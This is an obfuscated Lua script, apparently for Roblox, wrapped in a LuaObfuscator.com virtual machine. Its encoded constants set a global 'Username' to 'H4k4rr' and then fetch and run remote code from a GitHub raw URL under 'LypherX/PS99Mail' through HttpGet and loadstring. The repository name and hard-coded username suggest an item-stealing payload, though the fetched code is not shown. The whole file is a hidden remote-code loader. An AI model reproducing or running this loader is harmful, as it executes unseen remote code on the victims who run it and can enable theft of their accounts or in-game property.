--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v30,16));if v19 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v69,v19);v19=nil;v100=1;end end else return v69;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -((1432 -(282 + 595)) + 64)))) ;return v70-(v70%(932 -(857 + 74))) ;else local v71=0;local v72;while true do if (v71==(568 -((2004 -(1523 + 114)) + 201))) then v72=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v72 + v72))>=v72) and 1) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37=1065 -((125 -57) + 997) ;local v38;local v39;local v40;local v41;while true do if (v37==1) then return (v41 * (16778486 -(226 + 1044))) + (v40 * (285370 -(403577 -183743))) + (v39 * (373 -((382 -(87 + 263)) + 85))) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (961 -(892 + (245 -(67 + 113)))) ;v37=(2 + 0) -1 ;end end end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0 + 0)) then v45=3 -2 ;v46=(v20(v44,(1685 -732) -((1240 -(145 + 293)) + 150) ,53 -33 ) * ((3 -1)^((454 -(44 + 386)) + 8))) + v43 ;v42=999 -((2401 -(998 + 488)) + 82) ;end if (v42==(5 -3)) then v47=v20(v44,21,19 + 12 );v48=((v20(v44,32)==(1 -0)) and  -1) or (1188 -(1069 + 118)) ;v42=6 -3 ;end if (v42==0) then v43=v23();v44=v23();v42=1;end if (v42==((2 + 4) -3)) then if (v47==(0 + 0)) then if (v46==(0 -0)) then return v48 * (0 + 0 + 0) ;else v47=792 -(368 + (1195 -(201 + 571))) ;v45=0 -0 ;end elseif (v47==2047) then return ((v46==(18 -(10 + 8))) and (v48 * (((1141 -(116 + 1022)) -2)/0))) or (v48 * NaN) ;end return v8(v48,v47-(1465 -(416 + 26)) ) * (v45 + (v46/(2^(165 -113)))) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v66=3 -2 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=971 -(140 + 831) ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52~=(1 -0)) then else local v73=1850 -(1409 + 441) ;while true do if (v73~=(341 -(218 + 123))) then else local v98=1581 -(1535 + 46) ;while true do if (1==v98) then v73=719 -(15 + 703) ;break;end if (v98==0) then v56={v53,v54,nil,v55};v57=v23();v98=1;end end end if ((439 -(262 + 176))==v73) then v58={};v52=2;break;end end end if (v52~=(5 -2)) then else for v80=1468 -(899 + 568) ,v23() do v54[v80-(1722 -(345 + 1376)) ]=v28();end return v56;end if (v52==0) then local v74=0;local v75;while true do if (v74==(688 -(198 + 490))) then v75=0;while true do if (v75~=(4 -3)) then else v55={};v52=2 -1 ;break;end if (v75==(1206 -(696 + 510))) then local v118=603 -(268 + 335) ;while true do if (v118==(0 -0)) then v53={};v54={};v118=1263 -(1091 + 171) ;end if (v118==(573 -(426 + 146))) then v75=1 + 0 ;break;end end end end break;end end end if (v52~=(6 -4)) then else local v76=811 -(569 + 242) ;while true do if (v76==(3 -2)) then for v102=2 -1 ,v23() do local v103=0 + 0 ;local v104;local v105;local v106;while true do if (v103~=(375 -(123 + 251))) then else v106=nil;while true do if (v104==(1025 -(706 + 318))) then while true do if (v105~=0) then else v106=v21();if (v20(v106,1252 -(721 + 530) ,1)~=0) then else local v170=1271 -(945 + 326) ;local v171;local v172;local v173;while true do if (v170==1) then v173={v22(),v22(),nil,nil};if (v171==0) then local v193=0;while true do if (v193==(0 + 0)) then v173[2 + 1 ]=v22();v173[840 -(660 + 176) ]=v22();break;end end elseif (v171==(1 + 0)) then v173[205 -(14 + 188) ]=v23();elseif (v171==2) then v173[3]=v23() -((1088 -(461 + 625))^(691 -(534 + 141))) ;elseif (v171==(2 + 1)) then local v204=1171 -(418 + 753) ;local v205;local v206;while true do if (v204==0) then v205=0 + 0 ;v206=nil;v204=1 + 0 ;end if (v204==(1 -0)) then while true do if (v205~=(0 -0)) then else v206=0 -0 ;while true do if (v206~=(0 + 0)) then else v173[1 + 2 ]=v23() -((2 + 0)^(5 + 11)) ;v173[400 -(115 + 281) ]=v22();break;end end break;end end break;end end end v170=4 -2 ;end if (v170==(3 + 0)) then if (v20(v172,7 -4 ,10 -7 )~=(1 + 0)) then else v173[1326 -(1249 + 73) ]=v58[v173[4]];end v53[v102]=v173;break;end if (v170==2) then if (v20(v172,1 + 0 ,1)==(868 -(550 + 317))) then v173[2 -0 ]=v58[v173[4 -2 ]];end if (v20(v172,5 -3 ,2 -0 )~=(1 + 0)) then else v173[8 -5 ]=v58[v173[8 -5 ]];end v170=7 -4 ;end if (v170~=(285 -(134 + 151))) then else local v190=114 -(4 + 110) ;while true do if (v190==(584 -(57 + 527))) then v171=v20(v106,1667 -(970 + 695) ,5 -2 );v172=v20(v106,107 -(17 + 86) ,6);v190=1991 -(582 + 1408) ;end if (v190==(3 -2)) then v170=1;break;end end end end end break;end end break;end if (v104==(0 -0)) then local v119=0 -0 ;local v120;while true do if (v119==0) then v120=166 -(122 + 44) ;while true do if (v120==(1 -0)) then v104=1825 -(1195 + 629) ;break;end if (v120==(0 -0)) then local v177=0 + 0 ;while true do if (v177==(0 -0)) then v105=241 -(187 + 54) ;v106=nil;v177=781 -(162 + 618) ;end if (v177==1) then v120=1;break;end end end end break;end end end end break;end if (v103==(0 + 0)) then v104=0 + 0 ;v105=nil;v103=66 -(30 + 35) ;end end end v52=3;break;end if (v76~=0) then else for v107=1,v57 do local v108=0 -0 ;local v109;local v110;local v111;while true do if (v108~=0) then else v109=0 -0 ;v110=nil;v108=1;end if ((1 + 0)==v108) then v111=nil;while true do if (v109==(1636 -(1373 + 263))) then v110=v21();v111=nil;v109=1001 -(451 + 549) ;end if (v109==(1213 -(323 + 889))) then if (v110==(1 + 0)) then v111=v21()~=0 ;elseif (v110==(5 -3)) then v111=v24();elseif (v110==(4 -1)) then v111=v25();end v58[v107]=v111;break;end end break;end end end v56[4 -1 ]=v21();v76=1385 -(746 + 638) ;end end end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v82=v63;local v83=v64;local v84=v65;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (1==v97) then if (v95<=5) then if (v95<=2) then if (v95<=0) then local v122=0;local v123;local v124;local v125;local v126;local v127;while true do if (v122==5) then v86=v86 + 1 ;v94=v82[v86];v127=v94[2];v124,v125=v85(v92[v127](v13(v92,v127 + 1 ,v94[3])));v122=6;end if (v122==8) then v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];v122=9;end if (v122==3) then v94=v82[v86];v127=v94[2];v126=v92[v94[3]];v92[v127 + 1 ]=v126;v122=4;end if (v122==7) then v94=v82[v86];v127=v94[2];v92[v127]=v92[v127](v13(v92,v127 + 1 ,v87));v86=v86 + 1 ;v122=8;end if (v122==6) then v87=(v125 + v127) -1 ;v123=0;for v174=v127,v87 do local v175=0;while true do if (v175==0) then v123=v123 + 1 ;v92[v174]=v124[v123];break;end end end v86=v86 + 1 ;v122=7;end if (v122==9) then v86=v94[3];break;end if (v122==4) then v92[v127]=v126[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v122=5;end if (v122==2) then v86=v86 + 1 ;v94=v82[v86];if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v61;else v92[v94[2]]=v61[v94[3]];end v86=v86 + 1 ;v122=3;end if (v122==0) then v123=nil;v124,v125=nil;v126=nil;v127=nil;v122=1;end if (v122==1) then v61[v94[3]]=v92[v94[2]];v86=v86 + 1 ;v94=v82[v86];if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v61;else v92[v94[2]]=v61[v94[3]];end v122=2;end end elseif (v95==1) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end else v86=v94[3];end elseif (v95<=3) then local v128=v94[2];v92[v128]=v92[v128](v13(v92,v128 + 1 ,v87));elseif (v95>4) then for v165=v94[2],v94[3] do v92[v165]=nil;end else v92[v94[2]]();end elseif (v95<=8) then if (v95<=6) then if ((v94[3]=="_ENV") or (v94[3]=="getfenv")) then v92[v94[2]]=v61;else v92[v94[2]]=v61[v94[3]];end elseif (v95>7) then local v136=v94[2];local v137,v138=v85(v92[v136](v13(v92,v136 + 1 ,v94[3])));v87=(v138 + v136) -1 ;local v139=0;for v167=v136,v87 do v139=v139 + 1 ;v92[v167]=v137[v139];end else local v140=0;local v141;local v142;while true do if (v140==1) then v92[v141 + 1 ]=v142;v92[v141]=v142[v94[4]];break;end if (v140==0) then v141=v94[2];v142=v92[v94[3]];v140=1;end end end elseif (v95<=9) then v61[v94[3]]=v92[v94[2]];elseif (v95>10) then v92[v94[2]]=v94[3];else do return;end end v86=v86 + 1 ;break;end if (v97==0) then v94=v82[v86];v95=v94[1];v97=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503063O0048346B342O72030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00120B3O00014O0005000100013O0026013O0002000100010004023O0002000100120B000100013O00260100010005000100010004023O0005000100120B000200033O00122O000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O001400010004023O000500010004023O001400010004023O000200012O000A3O00017O00",v9(),...);
